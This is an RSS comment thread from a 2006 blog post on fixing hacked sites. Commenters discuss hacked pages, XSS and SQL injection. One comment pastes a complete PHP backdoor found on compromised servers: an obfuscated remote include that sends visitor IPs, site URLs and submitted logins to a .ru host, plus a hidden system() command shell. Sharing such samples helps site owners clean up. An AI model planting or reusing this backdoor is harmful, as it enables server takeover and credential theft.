Comments on: Fixing hacked sites http://spamhuntress.com/2006/09/26/fixing-hacked-sites/ Just another WordPress weblog Sat, 17 May 2008 03:58:48 +0000 http://wordpress.org/?v=2.0.7 by: Search Engines WEB http://spamhuntress.com/2006/09/26/fixing-hacked-sites/#comment-55750 Sat, 28 Oct 2006 05:25:10 +0000 http://spamhuntress.com/2006/09/26/fixing-hacked-sites/#comment-55750 Read this horror story about an entire Large firm's Website being Hacked and Banned without them even knowing about it <b>seroundtable.com/archives/006534.html</b> :-o if you look at the screenshot on the Google SERPs archive - you will notice many (dot)DHTML extensions Does anyone think this could have been done by competitors - is this a trend? Read this horror story about an entire Large firm’s Website being Hacked and Banned without them even knowing about it

seroundtable.com/archives/006534.html :-o

if you look at the screenshot on the Google SERPs archive - you will notice many (dot)DHTML extensions

Does anyone think this could have been done by competitors - is this a trend?

]]> by: Joe http://spamhuntress.com/2006/09/26/fixing-hacked-sites/#comment-46959 Sun, 01 Oct 2006 23:38:10 +0000 http://spamhuntress.com/2006/09/26/fixing-hacked-sites/#comment-46959 XSS or MySQL Injection are ways to insert bad code into a database, but this post is talking about what things are commonly affected when your server is compromised based on recent attacks. It appears databases are not being attacked in this way so far. But I would still much prefer to restore a backup of the database if possible. XSS or MySQL Injection are ways to insert bad code into a database, but this post is talking about what things are commonly affected when your server is compromised based on recent attacks. It appears databases are not being attacked in this way so far. But I would still much prefer to restore a backup of the database if possible.

]]> by: kay http://spamhuntress.com/2006/09/26/fixing-hacked-sites/#comment-46224 Fri, 29 Sep 2006 19:14:26 +0000 http://spamhuntress.com/2006/09/26/fixing-hacked-sites/#comment-46224 girl u dobt know what you r talking about. have u heard about XSS? how about MySQL Injection. "We haven’t seen any cases of altered databases so far." I did and used to do it. girl u dobt know what you r talking about. have u heard about XSS?

how about MySQL Injection.

“We haven’t seen any cases of altered databases so far.”
I did and used to do it.

]]> by: evariste http://spamhuntress.com/2006/09/26/fixing-hacked-sites/#comment-45079 Tue, 26 Sep 2006 10:17:50 +0000 http://spamhuntress.com/2006/09/26/fixing-hacked-sites/#comment-45079 (it decodes to something.ru, I can't remember. Anyway, been following your blog on and off for a while, you do good work, Spamhuntress!) (it decodes to something.ru, I can’t remember. Anyway, been following your blog on and off for a while, you do good work, Spamhuntress!)

]]> by: evariste http://spamhuntress.com/2006/09/26/fixing-hacked-sites/#comment-45077 Tue, 26 Sep 2006 10:15:29 +0000 http://spamhuntress.com/2006/09/26/fixing-hacked-sites/#comment-45077 Here's an example that showed up on a Hosting Matters server, a couple of months ago. The filename is "common.php", but there were hundreds of these, named things like "date.php" and "time.php". <code> <?php error_reporting(0); if(isset($_POST["l"]) and isset($_POST["p"])){     if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}     else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];} }else{$user_auth="";} if(!isset($_POST["log_flg"])){$log_flg="&log";} if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg)) {     if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}     if($_POST["l"]=="special"){print "sys_active". `uname -a`;} } ?></code> Here’s an example that showed up on a Hosting Matters server, a couple of months ago. The filename is “common.php”, but there were hundreds of these, named things like “date.php” and “time.php”.


<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>

]]>